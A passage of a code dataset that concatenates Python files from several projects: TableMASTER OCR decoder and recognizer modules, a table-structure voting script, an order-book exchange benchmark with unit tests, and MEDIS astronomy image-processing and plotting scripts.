SOS = torch.zeros(batch_size).long().to(out_enc.device)
SOS[:] = self.SOS
SOS = SOS.unsqueeze(1)
output, bbox_output = self.greedy_forward(SOS, out_enc, src_mask)
return output, bbox_output
def forward(self,
feat,
out_enc,
targets_dict=None,
img_metas=None,
train_mode=True):
self.train_mode = train_mode
if train_mode:
return self.forward_train(feat, out_enc, targets_dict, img_metas)
return self.forward_test(feat, out_enc, img_metas)
@DECODERS.register_module()
class TableMasterConcatDecoder(BaseDecoder):
"""
Split to two transformer header at the last layer.
Cls_layer is used to structure token classification.
Bbox_layer is used to regress bbox coord.
"""
def __init__(self,
N,
decoder,
d_model,
num_classes,
start_idx,
padding_idx,
max_seq_len,
):
super(TableMasterConcatDecoder, self).__init__()
self.layers = clones(DecoderLayer(**decoder), N-1)
self.cls_layer = clones(DecoderLayer(**decoder), 1)
self.bbox_layer = clones(DecoderLayer(**decoder), 1)
self.cls_fc = nn.Linear(d_model, num_classes)
self.bbox_fc = nn.Sequential(
nn.Linear(d_model, 4),
nn.Sigmoid()
)
self.norm = nn.LayerNorm(decoder.size)
self.embedding = Embeddings(d_model=d_model, vocab=num_classes)
self.positional_encoding = PositionalEncoding(d_model=d_model)
self.SOS = start_idx
self.PAD = padding_idx
self.max_length = max_seq_len
def make_mask(self, src, tgt):
"""
Make mask for self attention.
:param src: [b, c, h, l_src]
:param tgt: [b, l_tgt]
:return:
"""
trg_pad_mask = (tgt != self.PAD).unsqueeze(1).unsqueeze(3).byte()
tgt_len = tgt.size(1)
trg_sub_mask = torch.tril(torch.ones((tgt_len, tgt_len), dtype=torch.uint8, device=src.device))
tgt_mask = trg_pad_mask & trg_sub_mask
return None, tgt_mask
def decode(self, input, feature, src_mask, tgt_mask):
# main process of transformer decoder.
x = self.embedding(input)
x = self.positional_encoding(x)
# x_list = []
cls_x_list = []
bbox_x_list = []
# origin transformer layers
for i, layer in enumerate(self.layers):
x = layer(x, feature, src_mask, tgt_mask)
# cls head
for layer in self.cls_layer:
cls_x = layer(x, feature, src_mask, tgt_mask)
cls_x_list.append(cls_x)
cls_x = torch.cat(cls_x_list, dim=-1)
cls_x = self.norm(cls_x)
# bbox head
for layer in self.bbox_layer:
bbox_x = layer(x, feature, src_mask, tgt_mask)
bbox_x_list.append(bbox_x)
bbox_x = torch.cat(bbox_x_list, dim=-1)
bbox_x = self.norm(bbox_x)
return self.cls_fc(cls_x), self.bbox_fc(bbox_x)
def greedy_forward(self, SOS, feature, mask):
input = SOS
output = None
for i in range(self.max_length+1):
_, target_mask = self.make_mask(feature, input)
out, bbox_output = self.decode(input, feature, None, target_mask)
output = out
prob = F.softmax(out, dim=-1)
_, next_word = torch.max(prob, dim=-1)
input = torch.cat([input, next_word[:, -1].unsqueeze(-1)], dim=1)
return output, bbox_output
def forward_train(self, feat, out_enc, targets_dict, img_metas=None):
# x is token of label
# feat is feature after backbone before pe.
# out_enc is feature after pe.
device = feat.device
if isinstance(targets_dict, dict):
padded_targets = targets_dict['padded_targets'].to(device)
else:
padded_targets = targets_dict.to(device)
src_mask = None
_, tgt_mask = self.make_mask(out_enc, padded_targets[:,:-1])
return self.decode(padded_targets[:, :-1], out_enc, src_mask, tgt_mask)
def forward_test(self, feat, out_enc, img_metas):
src_mask = None
batch_size = out_enc.shape[0]
SOS = torch.zeros(batch_size).long().to(out_enc.device)
SOS[:] = self.SOS
SOS = SOS.unsqueeze(1)
output, bbox_output = self.greedy_forward(SOS, out_enc, src_mask)
return output, bbox_output
def forward(self,
feat,
out_enc,
targets_dict=None,
img_metas=None,
train_mode=True):
self.train_mode = train_mode
if train_mode:
return self.forward_train(feat, out_enc, targets_dict, img_metas)
return self.forward_test(feat, out_enc, img_metas)
```
#### File: textrecog/encoders/positional_encoding.py
```python
import math
import torch
import torch.nn.functional as F
from torch import nn
from mmocr.models.builder import ENCODERS
from .base_encoder import BaseEncoder
@ENCODERS.register_module()
class PositionalEncoding(BaseEncoder):
""" Implement the PE function. """
def __init__(self, d_model, dropout=0., max_len=5000):
super(PositionalEncoding, self).__init__()
self.dropout = nn.Dropout(p=dropout)
# Compute the positional encodings once in log space.
pe = torch.zeros(max_len, d_model)
position = torch.arange(0, max_len).unsqueeze(1).float()
div_term = torch.exp(torch.arange(0, d_model, 2).float() * -math.log(10000.0) / d_model)
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0)
self.register_buffer('pe', pe)
def forward(self, feat, **kwargs):
if len(feat.shape) > 3:
b, c, h, w = feat.shape
feat = feat.view(b, c, h*w) # flatten 2D feature map
feat = feat.permute((0,2,1))
feat = feat + self.pe[:, :feat.size(1)] # pe 1*5000*512
return self.dropout(feat)
def init_weights(self):
pass
```
#### File: textrecog/layers/context_block.py
```python
import torch
from torch import nn
class ContextBlock(nn.Module):
def __init__(self,
inplanes,
ratio,
headers,
pooling_type='att',
att_scale=False,
fusion_type='channel_add'):
super(ContextBlock, self).__init__()
assert pooling_type in ['avg', 'att']
assert fusion_type in ['channel_add', 'channel_mul', 'channel_concat']
assert inplanes % headers == 0 and inplanes >= 8 # inplanes must be divided by headers evenly
self.headers = headers
self.inplanes = inplanes
self.ratio = ratio
self.planes = int(inplanes * ratio)
self.pooling_type = pooling_type
self.fusion_type = fusion_type
self.att_scale = False
self.single_header_inplanes = int(inplanes / headers)
if pooling_type == 'att':
self.conv_mask = nn.Conv2d(self.single_header_inplanes, 1, kernel_size=1)
self.softmax = nn.Softmax(dim=2)
else:
self.avg_pool = nn.AdaptiveAvgPool2d(1)
if fusion_type == 'channel_add':
self.channel_add_conv = nn.Sequential(
nn.Conv2d(self.inplanes, self.planes, kernel_size=1),
nn.LayerNorm([self.planes, 1, 1]),
nn.ReLU(inplace=True),
nn.Conv2d(self.planes, self.inplanes, kernel_size=1))
elif fusion_type == 'channel_concat':
self.channel_concat_conv = nn.Sequential(
nn.Conv2d(self.inplanes, self.planes, kernel_size=1),
nn.LayerNorm([self.planes, 1, 1]),
nn.ReLU(inplace=True),
nn.Conv2d(self.planes, self.inplanes, kernel_size=1))
# for concat
self.cat_conv = nn.Conv2d(2 * self.inplanes, self.inplanes, kernel_size=1)
elif fusion_type == 'channel_mul':
self.channel_mul_conv = nn.Sequential(
nn.Conv2d(self.inplanes, self.planes, kernel_size=1),
nn.LayerNorm([self.planes, 1, 1]),
nn.ReLU(inplace=True),
nn.Conv2d(self.planes, self.inplanes, kernel_size=1))
def spatial_pool(self, x):
batch, channel, height, width = x.size()
if self.pooling_type == 'att':
# [N*headers, C', H , W] C = headers * C'
x = x.view(batch * self.headers, self.single_header_inplanes, height, width)
input_x = x
# [N*headers, C', H * W] C = headers * C'
# input_x = input_x.view(batch, channel, height * width)
input_x = input_x.view(batch * self.headers, self.single_header_inplanes, height * width)
# [N*headers, 1, C', H * W]
input_x = input_x.unsqueeze(1)
# [N*headers, 1, H, W]
context_mask = self.conv_mask(x)
# [N*headers, 1, H * W]
context_mask = context_mask.view(batch * self.headers, 1, height * width)
# scale variance
if self.att_scale and self.headers > 1:
context_mask = context_mask / torch.sqrt(self.single_header_inplanes)
# [N*headers, 1, H * W]
context_mask = self.softmax(context_mask)
# [N*headers, 1, H * W, 1]
context_mask = context_mask.unsqueeze(-1)
# [N*headers, 1, C', 1] = [N*headers, 1, C', H * W] * [N*headers, 1, H * W, 1]
context = torch.matmul(input_x, context_mask)
# [N, headers * C', 1, 1]
context = context.view(batch, self.headers * self.single_header_inplanes, 1, 1)
else:
# [N, C, 1, 1]
context = self.avg_pool(x)
return context
def forward(self, x):
# [N, C, 1, 1]
context = self.spatial_pool(x)
out = x
if self.fusion_type == 'channel_mul':
# [N, C, 1, 1]
channel_mul_term = torch.sigmoid(self.channel_mul_conv(context))
out = out * channel_mul_term
elif self.fusion_type == 'channel_add':
# [N, C, 1, 1]
channel_add_term = self.channel_add_conv(context)
out = out + channel_add_term
else:
# [N, C, 1, 1]
channel_concat_term = self.channel_concat_conv(context)
# use concat
_, C1, _, _ = channel_concat_term.shape
N, C2, H, W = out.shape
out = torch.cat([out, channel_concat_term.expand(-1, -1, H, W)], dim=1)
out = self.cat_conv(out)
out = nn.functional.layer_norm(out, [self.inplanes, H, W])
out = nn.functional.relu(out)
return out
```
#### File: textrecog/recognizer/master.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmdet.models.builder import DETECTORS, build_backbone, build_loss
from mmocr.models.builder import (build_convertor, build_decoder,
build_encoder, build_preprocessor)
from .encode_decode_recognizer import EncodeDecodeRecognizer
@DETECTORS.register_module()
class MASTER(EncodeDecodeRecognizer):
# need to inherit BaseRecognizer or EncodeDecodeRecognizer in mmocr
def __init__(self,
preprocessor=None,
backbone=None,
encoder=None,
decoder=None,
loss=None,
label_convertor=None,
train_cfg=None,
test_cfg=None,
max_seq_len=40,
pretrained=None):
super(MASTER, self).__init__(preprocessor,
backbone,
encoder,
decoder,
loss,
label_convertor,
train_cfg,
test_cfg,
max_seq_len,
pretrained)
def init_weights(self, pretrained=None):
for p in self.parameters():
if p.dim()>1:
nn.init.xavier_uniform_(p)
def forward_train(self, img, img_metas):
"""
Args:
img (tensor): Input images of shape (N, C, H, W).
Typically these should be mean centered and std scaled.
img_metas (list[dict]): A list of image info dict where each dict
contains: 'img_shape', 'filename', and may also contain
'ori_shape', and 'img_norm_cfg'.
For details on the values of these keys see
:class:`mmdet.datasets.pipelines.Collect`.
Returns:
dict[str, tensor]: A dictionary of loss components.
"""
feat = self.extract_feat(img)
feat = feat[-1]
gt_labels = [img_meta['text'] for img_meta in img_metas]
targets_dict = self.label_convertor.str2tensor(gt_labels)
out_enc = None
if self.encoder is not None:
out_enc = self.encoder(feat)
out_dec = self.decoder(
feat, out_enc, targets_dict, img_metas, train_mode=True)
loss_inputs = (
out_dec,
targets_dict,
img_metas,
)
losses = self.loss(*loss_inputs)
return losses
def simple_test(self, img, img_metas, **kwargs):
"""Test function with test time augmentation.
Args:
imgs (torch.Tensor): Image input tensor.
img_metas (list[dict]): List of image information.
Returns:
list[str]: Text label result of each image.
"""
feat = self.extract_feat(img)
feat = feat[-1]
out_enc = None
if self.encoder is not None:
out_enc = self.encoder(feat)
out_dec = self.decoder(
feat, out_enc, None, img_metas, train_mode=False)
label_indexes, label_scores = self.label_convertor.tensor2idx(
out_dec, img_metas)
label_strings = self.label_convertor.idx2str(label_indexes)
# flatten batch results
results = []
for string, score in zip(label_strings, label_scores):
results.append(dict(text=string, score=score))
return results
```
#### File: PubTabNet-master/examples/utils.py
```python
import re
from bs4 import BeautifulSoup as bs
def format_html(img):
''' Formats HTML code from tokenized annotation of img
'''
html_string = '''<html>
<head>
<meta charset="UTF-8">
<style>
table, th, td {
border: 1px solid black;
font-size: 10px;
}
</style>
</head>
<body>
<table frame="hsides" rules="groups" width="100%%">
%s
</table>
</body>
</html>''' % ''.join(img['html']['structure']['tokens'])
cell_nodes = list(re.finditer(r'(<td[^<>]*>)(</td>)', html_string))
assert len(cell_nodes) == len(img['html']['cells']), 'Number of cells defined in tags does not match the length of cells'
cells = [''.join(c['tokens']) for c in img['html']['cells']]
offset = 0
for n, cell in zip(cell_nodes, cells):
html_string = html_string[:n.end(1) + offset] + cell + html_string[n.start(2) + offset:]
offset += len(cell)
# prettify the html
soup = bs(html_string)
html_string = soup.prettify()
return html_string
if __name__ == '__main__':
import json
import sys
f = sys.argv[1]
with open(f, 'r') as fp:
annotations = json.load(fp)
for img in annotations['images']:
html_string = format_html(img)
print(html_string)
```
#### File: TableMASTER-mmocr/table_recognition/vote.py
```python
import os
import glob
import pickle
def merge_folder_results(result_files):
"""
merge structure results of once inference folder into a dict.
:param result_files: structure results file path of once structure inference.
:return:
"""
new_data = dict()
for result_file in result_files:
with open(result_file, 'rb') as f:
data = pickle.load(f)
new_data.update(data)
return new_data
def vote_structure_by_folder(folders):
"""
vote structure inference results. The first result must from the best single model.
:param folder: folders is a list of structure inference result.
:return:
"""
# get vote data dictionary
vote_data_dict = dict()
for folder in folders:
search_folder = os.path.join(folder, 'structure_master_results_*.pkl')
result_files = glob.glob(search_folder)
results = merge_folder_results(result_files)
for filename in results.keys():
if filename not in vote_data_dict.keys():
vote_data_dict.setdefault(filename, [results[filename]])
else:
vote_data_dict[filename].append(results[filename])
# vote, support 3 result vote.
final_result_dict = dict()
for filename in vote_data_dict.keys():
vote_data = vote_data_dict[filename]
vote_result_dict = dict()
# vote details
if vote_data[1]['text'] == vote_data[2]['text']:
vote_result_dict['text'] = vote_data[1]['text']
vote_result_dict['score'] = vote_data[1]['score']
vote_result_dict['bbox'] = vote_data[1]['bbox']
print(filename) # print the filename, whose voted result not from the best accuracy model.
else:
vote_result_dict['text'] = vote_data[0]['text']
vote_result_dict['score'] = vote_data[0]['text']
vote_result_dict['bbox'] = vote_data[0]['bbox']
final_result_dict[filename] = vote_result_dict
return final_result_dict
if __name__ == "__main__":
folders = [
'/result/structure_master_single_model_inference_result1/',
'/result/structure_master_single_model_inference_result2/',
'/result/structure_master_single_model_inference_result3/',
]
final_result_dict = vote_structure_by_folder(folders)
save_path = 'structure_master_results.pkl'
with open(save_path, 'wb') as f:
pickle.dump(final_result_dict, f)
```
|
{
"source": "jessmorecroft/Exchange",
"score": 2
}
|
#### File: jessmorecroft/Exchange/benchmark.py
```python
import sys
import os
import timeit
import gzip
import shutil
import glob
import datetime
import statistics
# The Azure pipeline for each solution is required to publish a flattened artifact named like the following examples:
#
# Part 1/cpp_solution -> part_1_cpp_solution
# Part 1/csharp_solution -> part_1_csharp_solution
#
# The Benchmark pipelines will extract these artifacts and then run this script.
#
# The artifact directory must contain a script or executable called 'runner' that will execute the program. This
# just simplifies this script so it does not need to know the vagaries of running executables for different languages.
def usage():
print(sys.argv[0] + ' <directory> <prefix> <iterations> input...')
if len(sys.argv) < 4:
usage()
sys.exit(1)
directory = sys.argv[1]
prefix = sys.argv[2]
iterations = int(sys.argv[3])
input_files = sys.argv[4:]
if iterations <= 0 or len(input_files) == 0:
usage()
sys.exit(1)
def line_count(file):
with open(file) as f:
for i, _ in enumerate(f):
pass
return i + 1
def uncompress(input):
if not input.endswith('.gz'):
return input
output = input[:-3]
with gzip.open(input, 'rb') as f_in:
with open(output, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
return output
results = {}
for input in input_files:
input = uncompress(input)
order_count = line_count(input)
results[order_count] = []
for solution in os.listdir(directory):
if not os.path.isdir(os.path.join(directory, solution)):
continue
if not solution.startswith(prefix):
continue
runner = os.path.relpath(os.path.join(directory, solution, 'runner'))
if not os.path.exists(runner):
continue
input_file = os.path.realpath(input)
working_directory = os.path.realpath(os.path.join(directory, solution))
output_file = os.path.realpath(os.path.join(working_directory, 'trades'))
for solution_file in glob.glob(os.path.join(working_directory, '*')):
os.chmod(solution_file, 0o755)
command = "subprocess.run(['./runner < {} > {}'], shell=True, cwd='{}')".format(input_file, output_file, working_directory)
try:
# TODO - support an exlusion file so we don't hard code this.
if solution.find('python') >= 0 or solution.find('swift') >= 0:
# These solutions are too slow for the big file and relatively slow on
# the small file. Because the comparison with other solutions isn't as important
# we don't care so much about the validity of the results.
if order_count > 100000:
continue
actual_iterations = 1
else:
actual_iterations = iterations
result = timeit.repeat(stmt = command, setup = "import subprocess", number = 1, repeat = actual_iterations)
if not os.path.exists(output_file):
continue
results[order_count].append((solution, statistics.median(result), line_count(output_file)))
except Exception as ex:
print(str(ex))
continue
def human_format(num):
magnitude = 0
while abs(num) >= 1000:
magnitude += 1
num /= 1000
return '{}{}'.format(int(num), ['', 'K', 'M', 'G', 'T', 'P'][magnitude])
languages = {
"cpp" : "C++",
"csharp" : "C#",
"fsharp" : "F#",
"rust" : "Rust",
"go" : "Go",
"swift" : "Swift",
"java" : "Java",
"python" : "Python",
"cython" : "Cython",
"c" : "C"
}
def language(solution):
name = solution.split('_')[2]
try:
return languages[name]
except KeyError:
return name
for order_count, solutions in results.items():
solutions.sort(key=lambda solution: solution[1])
print('||{} orders|trades|'.format(human_format(order_count)))
print('-|:-:|:-:|')
for solution in solutions:
time = str(datetime.timedelta(seconds=solution[1]))
print('|{}|{}|{}|'.format(language(solution[0]), time, solution[2]))
print("\n")
```
#### File: part_2/python_solution/test_orderbook.py
```python
import unittest
import Exchange
class TestOrderBook(unittest.TestCase):
def test_create(self):
o = Exchange.OrderBook("AUDUSD")
self.assertEqual(o.instrument, "AUDUSD")
self.assertEqual(o.buys, [])
self.assertEqual(o.sells, [])
def test_append(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "100", "1.47")
self.assertEqual(len(b.buys), 1)
self.assertEqual(len(b.sells), 0)
self.assertEqual(b.buys[0].qty, 100)
def test_append_sell(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "-100", "1.47")
self.assertEqual(len(b.buys), 0)
self.assertEqual(len(b.sells), 1)
self.assertEqual(b.sells[0].qty, 100)
class TestSorting(unittest.TestCase):
def test_append_sort_buy_inorder(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "100", "1.47")
b.append("A", "200", "1.47")
self.assertEqual(len(b.buys), 2)
self.assertEqual(len(b.sells), 0)
# remember, first element is top of book
self.assertEqual(b.buys[0].qty, 100)
self.assertEqual(b.buys[1].qty, 200)
def test_append_sort_sell_inorder(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "-100", "1.47")
b.append("A", "-200", "1.47")
self.assertEqual(len(b.sells), 2)
self.assertEqual(len(b.buys), 0)
# remember, first element is top of book
self.assertEqual(b.sells[0].qty, 100)
self.assertEqual(b.sells[1].qty, 200)
def test_append_sort_buy_rev(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "200", "1.48")
b.append("A", "100", "1.47")
self.assertEqual(len(b.buys), 2)
self.assertEqual(len(b.sells), 0)
# for buys, first element has highest price
self.assertEqual(b.buys[0].qty, 200)
self.assertEqual(b.buys[1].qty, 100)
def test_append_sort_sell_rev(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "-200", "1.48")
b.append("A", "-100", "1.47")
self.assertEqual(len(b.sells), 2)
self.assertEqual(len(b.buys), 0)
# for sells, first element has lowest price
self.assertEqual(b.sells[0].qty, 100)
self.assertEqual(b.sells[1].qty, 200)
class TestMatch(unittest.TestCase):
def test_not_overlapped(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "200", "1.46")
b.append("A", "-100", "1.47")
self.assertEqual(b.match(), [])
def test_same_size(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "100", "1.48")
b.append("A", "-100", "1.47")
# Overlap, price is the first entry in the book
tlist = b.match()
self.assertEqual(len(tlist), 1)
self.assertEqual(str(tlist[0]), "A:A:AUDUSD:100:1.48")
# check that the books have been updated
self.assertEqual(len(b.sells), 0)
self.assertEqual(len(b.buys), 0)
def test_buy_bigger(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "200", "1.48")
b.append("A", "-100", "1.47")
# Overlap, price is the first entry in the book
tlist = b.match()
self.assertEqual(len(tlist), 1)
self.assertEqual(str(tlist[0]), "A:A:AUDUSD:100:1.48")
# check that the books have been updated
self.assertEqual(len(b.sells), 0)
self.assertEqual(len(b.buys), 1)
# buy should have 100 shs left
self.assertEqual(b.buys[0].qty, 100)
def test_sell_bigger(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "100", "1.48")
b.append("A", "-200", "1.47")
# Overlap, price is the first entry in the book
tlist = b.match()
self.assertEqual(len(tlist), 1)
self.assertEqual(str(tlist[0]), "A:A:AUDUSD:100:1.48")
# check that the books have been updated
self.assertEqual(len(b.sells), 1)
self.assertEqual(len(b.buys), 0)
# sell should have 100 shs left
self.assertEqual(b.sells[0].qty, 100)
if __name__ == "__main__":
unittest.main()
```
#### File: part_2/python_solution/test_trade.py
```python
import unittest
import Exchange
class TestTrade(unittest.TestCase):
def test_create(self):
t = Exchange.Trade('Buyer', 'Seller', 'BHP', 100, 2.34)
self.assertEqual(t.buyer, 'Buyer')
self.assertEqual(t.seller, 'Seller')
self.assertEqual(t.instrument, 'BHP')
self.assertEqual(t.qty,100)
self.assertEqual(t.price, 2.34)
def test_str(self):
t = Exchange.Trade('Buyer', 'Seller', 'BHP', 100, 2.34)
self.assertEqual(str(t), "Buyer:Seller:BHP:100:2.34")
if __name__ == "__main__":
unittest.main()
```
|
{
"source": "jessmos/MEDIS",
"score": 2
}
|
#### File: MEDIS/Annulus Pipeline/Graphing Pipeline.py
```python
import os
import matplotlib.pyplot as plt
import numpy as np
import tables as pt
from matplotlib.colors import LogNorm, SymLogNorm
from skimage.util import img_as_ubyte
from skimage.util import invert
from skimage import color
from skimage import io
from numpy import inf
#import optics as opx
#c=os.chdir('C:/Users/jessm/PycharmProjects')
#print(c)
import sys
sys.path.append("C:/Users/jessm/OneDrive/Documents/Coding/proper_v3.2.3_python_3.x")
def open_obs_sequence_hdf5(obs_seq_file='hyper.h5'):
"""opens existing obs sequence .h5 file and returns it"""
# hdf5_path = "my_data.hdf5"
read_hdf5_file = pt.open_file(obs_seq_file, mode='r')
# Here we slice [:] all the data back into memory, then operate on it
obs_sequence = read_hdf5_file.root.data[:]
# hdf5_clusters = read_hdf5_file.root.clusters[:]
read_hdf5_file.close()
return obs_sequence
def cpx_to_intensity(data_in):
"""
converts complex data to units of intensity
WARNING: if you sum the data sequence over object or wavelength with simple case of np.sum(), must be done AFTER
converting to intensity, else results are invalid
"""
return np.abs(data_in)**2
def crop_center(img):
y,x = img.shape
if img.shape[0]<img.shape[1]:
cropx=img.shape[0]
startx = x//2-(cropx//2)
return img[:,startx:startx+cropx]
elif img.shape[1]<img.shape[0]:
cropy=img.shape[1]
starty = y//2-(cropy//2)
return img[starty:starty+cropy,:]
else :
print("it is already a cube")
return img
"""you have to put in the path to your own file"""
rebinned = open_obs_sequence_hdf5('C:/Users/jessm/.spyder-py3/MEDIS_spy/rebinned_cube5e8.h5')
#C:\Users\jessm\.spyder-py3\MEDIS_spy\
savename='np_rebinned5e8'
"""looking at fields"""
fields0 = open_obs_sequence_hdf5('C:/Users/jessm/.spyder-py3/MEDIS_spy/fields5e8.h5')
fields=fields0.astype(float)
#h5 file=complex image
#'timesteps', 'save planes', 'wavelengths', 'astronomical bodies', 'x', 'y'
print("Fields shape", fields.shape)
focal_sun=rebinned[0,-1,:,:]
focal_planet=fields[0,-1,:,:,:,:]
print("focal planet shape", focal_planet.shape)
print("rebinned cube shape", rebinned.shape)
#FOR REBINNED CUBE
#-no object or plane axis
#-rectangle
"""plotting fields"""
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111)
#cax = ax.imshow(np.sum(focal_planet, axis=(0,1)), vmin=1e-9, vmax=1e-4, origin='lower', norm=SymLogNorm(1e-10))
cax = ax.imshow(np.sum(cpx_to_intensity(focal_planet), axis=(0,1)), origin='lower', norm=LogNorm(vmin=1e-7, vmax=1e-3), cmap = "YlGnBu_r")
plt.title("Star and Planet Broadband - Unresolved Ringing")
plt.xlabel("X Coordinates")
plt.ylabel("Y Coordinates")
cb = plt.colorbar(cax)
plt.show()
"""cropping rebinned cube into cube"""
#print(crop_rebinned.shape)
rebinsum= np.sum(rebinned, axis=(0,1))
print("this is before cropping \n rebinned sum =", rebinsum.shape)
rebinsum=crop_center(rebinsum)
print("this is after cropping \n rebinned sum =", rebinsum.shape)
"""plotting lognorm rebinned cube"""
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111)
#cax=ax.imshow(np.sum(rebinned))
cax = ax.imshow(rebinsum, origin='lower', norm=SymLogNorm(1e-10,vmin=1e-1, base=np.e), cmap = "YlGnBu_r")
#SymLogNorm values were hand selected
#Symlognorm only uses positive values, but thats ok because we only have positive values
plt.title("Rebinned Cube")
plt.xlabel("X Coordinates")
plt.ylabel("Y Coordinates")
cb = plt.colorbar(cax)
plt.show()
"""log normalizing from 0 to 1"""
x=np.log(rebinsum)
print("max", np.amax(x), "min", np.amin(x))
x[x == -inf] = 0
normalized = (x-np.amin(x))/(np.amax(x)-np.amin(x))
imguint= np.array(normalized*65535, dtype=np.uint16)
#img=img/10
img= np.array(normalized, dtype=np.float32)
#print(img)
print("log normalized max=", np.amax(img), "log normalized min=", np.amin(img))
"""The log normalized rebinned cube image is saved in uint16 form (inferior) for use in the
Refined Otsu Pipeline, and also saved in float32 form (superior) for use in
the Intensity file."""
np.save(savename+'uint', imguint)
np.save(savename, img)
"""plotting"""
fig, axes = plt.subplots(1, 2, figsize=(8, 5), sharex=True, sharey=True)
ax = axes.ravel()
ary=ax[0].imshow(imguint, origin='lower', cmap=plt.cm.gray)
ax[0].set_title('Log Normalized in uint16')
plt.colorbar(ary, ax=ax[0], fraction=0.046, pad=0.04)
imgplt=ax[1].imshow(img, origin='lower', cmap=plt.cm.gray)
ax[1].set_title('Log Normalized in float32')
plt.colorbar(imgplt, ax=ax[1], fraction=0.046, pad=0.04)
plt.show()
"""plotting again"""
fig, axes = plt.subplots(1, 2, figsize=(8, 5), sharex=True, sharey=True)
ax = axes.ravel()
ary=ax[0].imshow(rebinsum, origin='lower', cmap=plt.cm.gray)
ax[0].set_title('Rebinned Cube')
plt.colorbar(ary, ax=ax[0], fraction=0.046, pad=0.04)
imgplt=ax[1].imshow(img, origin='lower', cmap=plt.cm.gray)
ax[1].set_title('Log Normalized Rebinned Cube')
plt.colorbar(imgplt, ax=ax[1], fraction=0.046, pad=0.04)
plt.show()
fig.savefig('dither12.png', dpi=100)
plt.show()
"""creating an image to save"""
fig = plt.figure(frameon=False, figsize=(5.12, 5.12),dpi=100)
ax = plt.Axes(fig, [0., 0., 1., 1.])
ax.set_axis_off()
fig.add_axes(ax)
cax = ax.imshow(img, origin='lower', cmap = "YlGnBu_r")
fig.savefig('rebinnedgraph.png', dpi=100)
plt.show()
```
#### File: MEDIS/Annulus Pipeline/Table Inpaint.py
```python
import os
import matplotlib.pyplot as plt
import numpy as np
from astropy.table import QTable, Table, Column
from astropy import units as u
dimage=np.load('np_align30.npy')
dthresh=np.load('thresh_a30.npy')
dtable=np.load('table_a30.npy')
#reimage=np.load('np_rebinned5e7.npy')
#rethresh=np.load('thresh5e7.npy')
#retable=np.load('table5e7.npy')
reimage=np.load('inpaint_a30.npy')
rethresh=np.load('thresh_inpaint_a30.npy')
retable=np.load('table_inpaint_a30.npy')
print(dtable.shape, retable.shape)
"""plot"""
fig, axes = plt.subplots(2, 2, figsize=(10,10), sharex=False, sharey=False)
ax = axes.ravel()
ary=ax[0].imshow(dimage, origin='lower', cmap = "YlGnBu_r")
ax[0].set_title('Temporal Cube Slice of MEC Image')
plt.colorbar(ary, ax=ax[0], fraction=0.046, pad=0.04)
imgplt=ax[1].imshow(dimage*dthresh, origin='lower', cmap = "YlGnBu_r")
ax[1].set_title('Masked Temporal MEC Image \nOnly Speckles')
plt.colorbar(imgplt, ax=ax[1], fraction=0.046, pad=0.04)
ary=ax[2].imshow(reimage, origin='lower', cmap = "YlGnBu_r")
ax[2].set_title('Inpainted MEC Image')
plt.colorbar(ary, ax=ax[2], fraction=0.046, pad=0.04)
imgplt=ax[3].imshow(reimage*rethresh, origin='lower', cmap = "YlGnBu_r")
ax[3].set_title('Masked Inpainted MEC Image \nOnly Speckles')
plt.colorbar(imgplt, ax=ax[3], fraction=0.046, pad=0.04)
plt.show()
"""table"""
middle=np.array([0,0,0,0])
retable=np.vstack((np.round(retable, decimals=2)))
dtable=np.vstack((np.round(dtable, decimals=2)))
#print(np.hstack([dname,rename]))
def reshape_rows(array1, array2):
if array1.shape[0] > array2.shape[0]:
resizea2=array2.copy()
resizea2.resize(array1.shape[0], array2.shape[1])
reshaped=np.hstack([array1, resizea2])
return(reshaped)
if array1.shape[0] < array2.shape[0]:
resizea1=array1.copy()
resizea1.resize(array2.shape[0], array1.shape[1])
reshaped=np.hstack([resizea1,array2])
return(reshaped)
else:
reshaped=np.hstack([array1, array2])
return(reshaped)
sidebyside=reshape_rows(retable, dtable)
show=Table(sidebyside, names=('Pixels', 'Speckles', 'Percent', 'Intensity', 'InPixels', 'InSpeckles', 'InPercent', 'InAvg Intensity'))
show.pprint_all()
```
#### File: MEDIS/medis/utils.py
```python
import numpy as np
from inspect import getframeinfo, stack
import pickle
import tables as pt
import astropy.io.fits as afits
from medis.params import sp, ap, tp, iop
def dprint(*message, path_display=-3):
"""
prints location of code where message is printed from
>>> dprint('foo', 5000, (), np.arange(9).reshape(3,3))
MEDIS++/medis/optics.py:173 - lol, 5000, (), [[0 1 2]
[3 4 5]
[6 7 8]]
path_to_display : integer number of folders back from the module location to display in printed statement
"""
caller = getframeinfo(stack()[1][0])
message_str = ''
for mess in message:
message_str += f'{mess}, '
message_str = message_str[:-2]
reduced_filename = '/'.join(caller.filename.split('/')[path_display:])
print("%s:%d - %s" % (reduced_filename, caller.lineno, message_str))
def phase_cal(wavelengths):
"""Wavelength in nm"""
phase = tp.wavecal_coeffs[0] * wavelengths + tp.wavecal_coeffs[1]
return phase
####################################################################################################
# Functions Relating to Reading, Loading, and Saving Data #
####################################################################################################
def save_to_disk_sequence(obs_sequence, obs_seq_file='obs_seq.pkl'):
"""saves obs sequence as a .pkl file
:param obs_sequence- Observation sequence, 6D data structure
:param obs_seq_file- filename for saving, including directory tree
"""
#dprint((obs_seq_file, obs_seq_file[-3:], obs_seq_file[-3:] == '.h5'))
if obs_seq_file[-3:] == 'pkl':
with open(obs_seq_file, 'wb') as handle:
pickle.dump(obs_sequence, handle, protocol=pickle.HIGHEST_PROTOCOL)
elif obs_seq_file[-3:] == 'hdf' or obs_seq_file[-3:] == '.h5':
f = pt.open_file(obs_seq_file, 'w')
ds = f.create_array(f.root, 'data', obs_sequence)
f.close()
else:
dprint('Extension not recognised')
def check_exists_obs_sequence(plot=False):
"""
